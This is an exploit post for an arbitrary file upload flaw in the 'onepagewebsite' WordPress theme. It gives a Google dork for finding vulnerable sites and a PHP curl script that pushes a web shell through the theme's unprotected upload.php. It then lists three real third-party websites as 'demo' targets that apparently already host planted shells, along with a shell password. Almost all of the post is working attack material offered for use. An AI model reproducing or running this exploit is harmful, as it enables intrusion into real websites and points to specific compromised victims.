facebook facebook twitter rss

Wordpress Themes - onepagewebsite Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 29-11-2012
 -------------------------------------------------------------------------------
Wordpress Themes - onepagewebsite Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/onepagewebsite"
#
#######################################################################################

---------------------------------------------------------------------------------------

Exploit : uploadshell.php

<?php

$uploadfile
="dz.php";

$ch curl_init("http://www.localhost/wp-content/themes/onepagewebsite/uploads/upload.php?folder=/wp-content/themes/onepagewebsite/uploads/uploads/");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>


Shell Access : http://www.localhost/wp-content/themes/onepagewebsite/uploads/uploads/dz.php

dz.php
<?php
phpinfo
();
?>


---------------------------------------------------------------------------------------

Demo :

1) http://www.simpleonlinestrategies.com.au/wp-content/themes/onepagewebsite/uploads/uploads/x.php

2) http://bizbeknown.com/wp-content/themes/onepagewebsite/uploads/uploads/x.php

3) http://www.cheapfurnitureremovals.net.au/wp-content/themes/onepagewebsite/uploads/uploads/x.php

_____________________
Shell password => dz0
_____________________
-----------------------------------------------------------------------------------------

Like us on Facebook :